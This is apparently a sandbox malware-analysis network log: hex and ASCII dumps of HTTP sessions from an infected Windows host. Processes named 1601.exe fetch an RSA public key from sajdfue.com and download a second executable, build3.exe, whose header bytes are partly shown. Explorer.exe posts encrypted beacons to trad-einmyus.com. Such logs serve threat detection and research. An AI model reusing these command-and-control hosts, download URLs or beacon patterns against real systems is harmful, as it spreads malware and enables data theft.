Apr 4, 2024 17:49:04.286926985 CEST	1286	IN	Data Raw: b5 b9 1d 90 f7 71 4c 6c a7 5a 63 2c 31 52 6d e8 c7 e6 3d e1 aa 61 3f a9 85 6c e5 72 bc ed 60 f0 e9 b7 6f 98 bc ab c0 bc 1b 18 97 c5 0e 0b 8d 69 ac 40 68 6e 52 be 33 54 9b 7e f2 2e e2 3b fa 02 bc 8d 50 5a 9e a0 9c 16 4c b5 43 2a 17 d1 cd 9a 98 03 Data Ascii: qLlZc,1Rm=a?lr`oi@hnR3T~.;PZLCC(xMT_`X1%DY:(dqI2MMz~Ara&C4';S75BB(+FHu^K(#Vju/}-`AI
Apr 4, 2024 17:49:04.286941051 CEST	1286	IN	Data Raw: 14 57 dc 00 8d 5b a7 00 1c e0 d9 00 56 44 a6 00 00 07 05 01 90 91 d9 00 2b e4 04 01 97 2b ad 00 3b f0 a9 00 70 6b a8 00 26 6c ad 00 85 9a a7 00 de 7d ad 00 a5 df d9 00 d9 5d c8 00 72 52 aa 00 95 99 dc 00 30 18 da 00 8c 97 04 01 6b 30 07 01 dc e6 Data Ascii: W[VD++;pk&l}]rR0k0N5`Z/vTkr$.]pQLq<+4rhsq=F5u\R,
Apr 4, 2024 17:49:04.286953926 CEST	1286	IN	Data Raw: ba d5 86 d9 58 db 48 27 e6 a9 ba c9 08 7b 28 af ae 29 3f fd 86 6b 4d af 2a 75 ca 6b 05 e0 bc 29 89 24 30 c9 a7 2e 72 eb 4b e2 4f 0f 87 e1 82 61 00 68 37 85 04 a3 89 47 00 e9 af d8 30 00 c1 6c 24 08 ce d3 ea e9 ab 9f 32 00 8d 64 24 1c e9 6e 1f 62 Data Ascii: XH'{()?kM*uk)$0.rKOah7G0l$2d$nb68gj<_EBCNSU7(Bq_M^w1o>ht$O1&(afffffI)DL'16fD$
Apr 4, 2024 17:49:04.286967039 CEST	1286	IN	Data Raw: ac 1b ad 3b 8d 64 24 1c e9 9b 6e 03 00 8b 8c 31 f4 9f 57 9c ba 9f 9c b9 f3 66 f7 d2 53 0f bf da 0f a3 d2 0f a2 e8 d5 3b 31 00 0f 82 b6 eb 60 00 8d 64 24 14 e9 82 1a 62 00 0f 34 e8 86 54 5e 00 66 0f b6 8c 0f 7e a2 d9 9b ba 39 83 1f cc c7 44 24 00 Data Ascii: ;d$n1WfS;1`d$b4T^f~9D$864PRT'f\$K]?f4r0fHTL2'oP?3&%~uU [LEKc#:F33$
Apr 4, 2024 17:49:04.287062883 CEST	1286	IN	Data Raw: aa 80 8d 02 9d 2c 10 4e 0c 1e a8 32 ee 00 ab ef a3 d4 20 aa 57 6a d5 b5 0d 00 86 92 bf ee 8c c5 a8 82 eb ad b7 a7 3f 56 33 be a4 9d 83 00 79 7b 3a 86 3a 89 3d 55 bd a7 a4 86 11 90 5f ea e8 3d 34 86 aa 00 d4 b7 c6 e6 25 4a d5 88 79 55 7f a2 2e 79 Data Ascii: ,N2 Wj?V3y{::=U_=4%JyU.yN7rBa=aTiA7T0yU8mHy*o~TdziPVG 9a5/N`CcbGYhL[c3L=Y8G[5ol#Z
Apr 4, 2024 17:49:04.287076950 CEST	1286	IN	Data Raw: 63 04 6a 98 d0 92 27 9e a1 2d 83 7b 3b aa 93 7d 75 6e 53 ec e0 ff ff ff ff 6d 88 eb c8 e5 ff ff ff ff 18 a9 5f 59 6e 05 59 de dd 72 1b 0f 5a e0 28 65 12 eb ad b0 73 af e4 34 57 1f 23 25 9f ce 3a 59 08 0a aa bc ff 27 7d 8f ce 7d ca ff ff ff ff 39 Data Ascii: cj'-{;}unSm_YnYrZ(es4W#%:Y'}}9B%"%no-/MeNKWR9Yir;AHYIr$N~AthZ5K?:RU~s3Y[RYrl\>YmdYrYhg uiX%/7e#
Apr 4, 2024 17:49:04.287182093 CEST	1286	IN	Data Raw: 8b 8c 4a ee 2d f5 bf 0f 82 13 87 36 00 d6 7d fc b6 e4 0d ed 47 87 cd e9 6d 03 50 c1 d3 f1 80 10 92 62 a0 94 28 76 bd 3c 56 04 7d fd bf 4f 1d ac de a9 e6 e0 ff ff ff ff 99 42 68 ba df ff ff ff ff 55 1f 8b a3 77 7e a3 66 8e 71 e5 64 71 f6 20 f2 9c Data Ascii: J-6}GmPb(v<V}OBhUw~fqdq `-3.WTaRko4B8H0*40T2&<F-TN&,EDiuOk%.!iu_!{k$HCA"d%Dk0R^6LI.0d
Apr 4, 2024 17:49:04.649857044 CEST	1286	IN	Data Raw: 80 d6 fd 88 f4 2e 8a c4 cf b2 ce a4 60 ae a5 e0 7c 76 72 34 3f a2 9e 6c c8 16 3d 20 1c 7e ba 44 05 84 14 f6 06 f4 c0 dc c2 39 b8 aa 88 71 f1 53 a3 a1 95 71 1f 0c 9d af cd 74 f4 06 f6 7c 58 9c f2 11 5a 61 1e 35 e5 ff ff ff ff 19 3c eb a6 14 ab 31 Data Ascii: .`\|vr4?l= ~D9qSqt\|XZa5<1=!31qS1Z7{PuikoRSD$87\|h"&5w^D.nb0o]"**6/@IjQ ^fq1o5i_]v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49732	189.195.132.134	80	3944	C:\Users\user\AppData\Local\Temp\1601.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:06.378113031 CEST	139	OUT	GET /test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: sajdfue.com
Apr 4, 2024 17:49:06.979370117 CEST	770	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:22 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 566 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 30 4a 64 77 62 52 6b 30 44 45 51 5c 2f 4e 48 48 31 59 6d 50 38 5c 5c 6e 71 59 66 64 62 4f 53 50 34 70 4c 32 4e 77 30 74 32 75 30 4c 6a 53 35 76 41 30 49 63 5c 2f 71 5c 2f 46 5c 2f 46 4a 67 39 6f 68 47 74 7a 71 6e 35 62 45 52 78 6a 74 6a 69 63 78 38 50 32 4b 31 56 43 62 34 5c 5c 6e 79 67 73 31 31 38 2b 7a 6d 42 4d 69 32 4f 4e 31 6d 5c 2f 61 57 72 68 67 66 45 7a 50 66 6d 74 54 54 4e 53 57 39 46 77 65 30 57 69 6e 67 41 37 7a 4d 75 51 52 36 61 31 69 63 37 4e 65 65 71 66 6d 2b 5c 5c 6e 4f 52 5a 5a 4a 31 5a 62 51 57 75 38 67 4a 67 5c 2f 54 63 4c 50 4b 7a 36 41 51 49 35 4f 47 33 41 49 73 39 52 6c 45 37 33 68 34 4b 6f 44 67 41 7a 50 62 49 6b 5c 2f 65 5a 37 70 79 68 41 6c 6e 4c 62 31 5c 5c 6e 46 77 57 49 38 6b 68 41 75 35 6f 72 6d 35 6b 4a 7a 69 74 57 45 76 72 76 38 54 79 63 6d 33 36 65 32 4e 37 38 75 73 33 62 6c 2b 76 2b 44 66 43 50 49 4c 72 6b 7a 2b 64 4b 72 51 78 51 6a 71 53 4e 5c 5c 6e 36 58 75 54 70 37 34 4f 5a 58 39 68 45 36 45 66 4a 5c 2f 42 58 73 6c 6b 78 58 2b 5c 2f 4d 6e 6f 4f 38 37 31 55 68 66 35 6c 38 4d 67 5c 2f 2b 7a 66 35 5c 2f 59 56 6a 58 38 5c 2f 66 6b 33 45 33 58 75 6e 67 4b 5c 5c 6e 33 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 54 6b 56 48 66 43 49 49 77 61 41 79 44 4a 75 46 70 42 45 67 7a 49 5a 67 59 37 49 58 44 36 43 39 6f 72 6d 52 41 7a 49 66 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JdwbRk0DEQ\/NHH1YmP8\\nqYfdbOSP4pL2Nw0t2u0LjS5vA0Ic\/q\/F\/FJg9ohGtzqn5bERxjtjicx8P2K1VCb4\\nygs118+zmBMi2ON1m\/aWrhgfEzPfmtTTNSW9Fwe0WingA7zMuQR6a1ic7Neeqfm+\\nORZZJ1ZbQWu8gJg\/TcLPKz6AQI5OG3AIs9RlE73h4KoDgAzPbIk\/eZ7pyhAlnLb1\\nFwWI8khAu5orm5kJzitWEvrv8Tycm36e2N78us3bl+v+DfCPILrkz+dKrQxQjqSN\\n6XuTp74OZX9hE6EfJ\/BXslkxX+\/MnoO871Uhf5l8Mg\/+zf5\/YVjX8\/fk3E3XungK\\n3wIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49733	189.195.132.134	80	7496	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:06.460714102 CEST	128	OUT	GET /test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: sajdfue.com
Apr 4, 2024 17:49:07.043114901 CEST	770	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:22 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 566 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 30 4a 64 77 62 52 6b 30 44 45 51 5c 2f 4e 48 48 31 59 6d 50 38 5c 5c 6e 71 59 66 64 62 4f 53 50 34 70 4c 32 4e 77 30 74 32 75 30 4c 6a 53 35 76 41 30 49 63 5c 2f 71 5c 2f 46 5c 2f 46 4a 67 39 6f 68 47 74 7a 71 6e 35 62 45 52 78 6a 74 6a 69 63 78 38 50 32 4b 31 56 43 62 34 5c 5c 6e 79 67 73 31 31 38 2b 7a 6d 42 4d 69 32 4f 4e 31 6d 5c 2f 61 57 72 68 67 66 45 7a 50 66 6d 74 54 54 4e 53 57 39 46 77 65 30 57 69 6e 67 41 37 7a 4d 75 51 52 36 61 31 69 63 37 4e 65 65 71 66 6d 2b 5c 5c 6e 4f 52 5a 5a 4a 31 5a 62 51 57 75 38 67 4a 67 5c 2f 54 63 4c 50 4b 7a 36 41 51 49 35 4f 47 33 41 49 73 39 52 6c 45 37 33 68 34 4b 6f 44 67 41 7a 50 62 49 6b 5c 2f 65 5a 37 70 79 68 41 6c 6e 4c 62 31 5c 5c 6e 46 77 57 49 38 6b 68 41 75 35 6f 72 6d 35 6b 4a 7a 69 74 57 45 76 72 76 38 54 79 63 6d 33 36 65 32 4e 37 38 75 73 33 62 6c 2b 76 2b 44 66 43 50 49 4c 72 6b 7a 2b 64 4b 72 51 78 51 6a 71 53 4e 5c 5c 6e 36 58 75 54 70 37 34 4f 5a 58 39 68 45 36 45 66 4a 5c 2f 42 58 73 6c 6b 78 58 2b 5c 2f 4d 6e 6f 4f 38 37 31 55 68 66 35 6c 38 4d 67 5c 2f 2b 7a 66 35 5c 2f 59 56 6a 58 38 5c 2f 66 6b 33 45 33 58 75 6e 67 4b 5c 5c 6e 33 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 54 6b 56 48 66 43 49 49 77 61 41 79 44 4a 75 46 70 42 45 67 7a 49 5a 67 59 37 49 58 44 36 43 39 6f 72 6d 52 41 7a 49 66 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JdwbRk0DEQ\/NHH1YmP8\\nqYfdbOSP4pL2Nw0t2u0LjS5vA0Ic\/q\/F\/FJg9ohGtzqn5bERxjtjicx8P2K1VCb4\\nygs118+zmBMi2ON1m\/aWrhgfEzPfmtTTNSW9Fwe0WingA7zMuQR6a1ic7Neeqfm+\\nORZZJ1ZbQWu8gJg\/TcLPKz6AQI5OG3AIs9RlE73h4KoDgAzPbIk\/eZ7pyhAlnLb1\\nFwWI8khAu5orm5kJzitWEvrv8Tycm36e2N78us3bl+v+DfCPILrkz+dKrQxQjqSN\\n6XuTp74OZX9hE6EfJ\/BXslkxX+\/MnoO871Uhf5l8Mg\/+zf5\/YVjX8\/fk3E3XungK\\n3wIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49734	189.195.132.134	80	3944	C:\Users\user\AppData\Local\Temp\1601.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:06.605631113 CEST	96	OUT	GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: sajdfue.com
Apr 4, 2024 17:49:07.225452900 CEST	1286	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:22 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT ETag: "4ae00-6074de5a4a562" Accept-Ranges: bytes Content-Length: 306688 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6krh8rh8rh88sh8l8nh8l8h8U_8{h8ri8h8l82h8l8sh8l8sh8Richrh8PELaj; @>lhd>/0@.textrhj `.data:n@.kic>\|@.rsrc/>0~@@
Apr 4, 2024 17:49:07.225676060 CEST	1286	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 73 03 00 00 00 00 00 8c 73 03 00 9c 73 03 00 00 00 00 00 f6 6b 03 00 0c 6c 03 00 22 6c 03 00 2e 6c 03 00 48 6c 03 00 5a 6c 03 00 70 6c 03 00 86 6c 03 00 96 6c 03 00 ac 6c 03 00 c0 6c 03 00 d0 6c Data Ascii: ssskl"l.lHlZlpllllllllm m4mBm^mtmmmmmmmnn&n@n\nlnnnnnnnnnoo,o@oTo`opoookoo
Apr 4, 2024 17:49:07.408917904 CEST	1286	IN	Data Raw: 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 62 00 61 00 73 00 69 00 63 00 5f 00 73 00 74 00 72 00 69 00 6e 00 67 00 3c 00 63 00 68 00 61 00 72 00 2c 00 Data Ascii: ::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Vector_const_ite
Apr 4, 2024 17:49:07.409003019 CEST	1286	IN	Data Raw: 3e 00 3d 00 20 00 63 00 6f 00 75 00 6e 00 74 00 00 00 00 00 73 00 72 00 63 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 6d 00 65 00 6d 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 Data Ascii: >= countsrc != NULLmemcpy_sf:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.cdst != NULLmemmove_sf:\dd\vctools\crt_
Apr 4, 2024 17:49:07.409198999 CEST	1286	IN	Data Raw: 68 00 65 00 20 00 56 00 69 00 73 00 75 00 61 00 6c 00 20 00 43 00 2b 00 2b 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 61 00 74 00 69 00 6f 00 6e 00 20 00 6f 00 6e 00 20 00 61 00 73 00 73 00 65 00 72 00 74 00 73 00 2e 00 00 00 00 00 Data Ascii: he Visual C++ documentation on asserts.memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)),
Apr 4, 2024 17:49:07.409282923 CEST	1286	IN	Data Raw: 00 00 00 00 28 00 73 00 74 00 72 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 29 00 00 00 70 00 75 00 74 00 63 00 00 00 00 00 76 00 73 00 63 00 61 00 6e 00 66 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 Data Ascii: (str != NULL)putcvscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)f:\dd\vctools\crt_bld\self_x86\crt\src\_file.cf:\
Apr 4, 2024 17:49:07.600423098 CEST	1286	IN	Data Raw: 20 72 6f 75 74 69 6e 65 73 2c 20 75 73 65 20 5f 61 6c 69 67 6e 65 64 5f 72 65 61 6c 6c 6f 63 28 29 00 00 00 00 00 45 72 72 6f 72 3a 20 6d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 69 6f 6e 3a 20 62 61 64 20 6d 65 6d 6f 72 79 20 62 6c 6f 63 6b 20 74 Data Ascii: routines, use _aligned_realloc()Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).Client hook re-allocation failure.Client hook re-alloca
Apr 4, 2024 17:49:07.600519896 CEST	1286	IN	Data Raw: 65 64 20 61 74 20 25 68 73 28 25 64 29 2e 0a 00 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 66 72 65 65 20 66 61 69 6c 75 72 65 2e 0a 00 00 00 00 00 00 54 68 65 20 42 6c 6f 63 6b 20 61 74 20 30 78 25 70 20 77 61 73 20 61 6c 6c 6f 63 61 74 65 64 20 62 79 Data Ascii: ed at %hs(%d).Client hook free failure.The Block at 0x%p was allocated by aligned routines, use _aligned_free()_msize_dbg%hs located at 0x%p is %Iu bytes long.%hs located at 0x%p is %Iu bytes long.Memory allo
Apr 4, 2024 17:49:07.600591898 CEST	1286	IN	Data Raw: 75 00 77 00 00 00 53 00 6f 00 6c 00 6f 00 66 00 75 00 64 00 69 00 20 00 67 00 6f 00 78 00 6f 00 72 00 75 00 76 00 20 00 73 00 61 00 70 00 6f 00 63 00 75 00 7a 00 69 00 00 00 4e 00 69 00 6d 00 69 00 67 00 6f 00 74 00 20 00 67 00 69 00 66 00 6f 00 Data Ascii: uwSolofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaMawoyujewoyosigubufozo wami xuxolesenawemo dohamefej
Apr 4, 2024 17:49:07.600661993 CEST	1286	IN	Data Raw: 63 00 68 00 61 00 72 00 3e 00 2c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 68 00 61 00 72 00 3e 00 20 00 3e 00 20 00 3e 00 20 00 3e 00 3a 00 3a 00 6f 00 Data Ascii: char>,class std::allocator<char> > > >::operator +=("this->_Has_container()", 0)C:\Program Files (x86)\Microsoft Visual
Apr 4, 2024 17:49:07.600776911 CEST	1286	IN	Data Raw: 65 00 6d 00 43 00 68 00 65 00 63 00 6b 00 70 00 6f 00 69 00 6e 00 74 00 00 00 73 00 74 00 61 00 74 00 65 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 4f 62 6a 65 63 74 20 64 75 6d 70 20 63 6f 6d 70 6c 65 74 65 2e 0a 00 00 63 72 74 20 Data Ascii: emCheckpointstate != NULLObject dump complete.crt block at 0x%p, subtype %x, %Iu bytes long.normal block at 0x%p, %Iu bytes long.client block at 0x%p, subtype %x, %Iu bytes long.{%ld} %hs(%d) : #File

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49737	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:09.231909037 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ehdswwmhlqrs.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 274 Host: trad-einmyus.com
Apr 4, 2024 17:49:09.231909037 CEST	274	OUT	Data Raw: 12 87 87 93 60 f8 a1 b4 ca 36 76 30 7d bd 91 8e 46 62 ae 33 a3 44 63 ef b9 9c dd 86 8e d0 9b f1 1c b0 5c a7 6a 1e cc 96 99 af f3 db c7 9c 11 66 68 f6 39 bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 93 66 5d 02 c9 a1 c1 64 12 bb b0 6d Data Ascii: `6v0}Fb3Dc\jfh9\Fu$f]dmz8g1w\FRQ2/bz\'~.;G],o#,+91Je_8u/<<ML5+a3pMnI_'EL]FK2uul.an8XeJspn
Apr 4, 2024 17:49:09.528785944 CEST	597	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.2 Date: Thu, 04 Apr 2024 15:49:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	49738	193.106.175.76	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 4, 2024 17:49:09.814891100 CEST	282	OUT	POST /index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jdodcmixlyen.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: trad-einmyus.com
